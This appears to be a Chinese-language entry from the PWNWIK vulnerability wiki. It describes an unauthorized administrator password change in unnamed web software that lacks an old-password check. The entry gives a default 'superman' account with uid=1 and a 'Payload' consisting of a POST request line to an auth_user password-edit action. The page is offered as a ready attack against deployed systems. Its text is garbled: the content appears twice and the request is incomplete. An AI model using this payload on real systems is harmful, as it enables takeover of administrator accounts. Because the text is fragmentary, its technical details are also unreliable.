PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
漏洞原理
管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。
默认用户
superman --- uid=1
Payload
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
pwnwiki.com
◆◆0
返回顶部
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。
superman --- uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
pwnwiki.com